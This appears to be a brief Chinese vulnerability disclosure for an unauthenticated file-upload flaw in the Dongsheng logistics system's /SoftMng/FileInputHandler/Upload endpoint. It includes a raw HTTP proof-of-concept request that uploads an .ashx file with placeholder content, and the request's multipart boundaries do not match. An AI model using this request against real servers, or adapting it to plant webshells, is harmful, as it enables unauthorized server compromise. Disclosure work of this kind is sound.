漏洞描述
东胜物流系统是一款用于物流管理的系统。该系统的 /SoftMng/FileInputHandler/Upload 接口存在未授权的文件上传漏洞。攻击者可以通过该接口上传恶意文件(如webshell),从而获取服务器权限,导致系统安全受到严重威胁。
POST /SoftMng/FileInputHandler/Upload HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTqkdY1lCvbvpmown
------WebKitFormBoundaryaKljzbg49Mq4ggLz
Content-Disposition: form-data; name="LoadFile"; filename="1.ashx"
Content-Type: application/octet-stream
12312
------WebKitFormBoundaryaKljzbg49Mq4ggLz--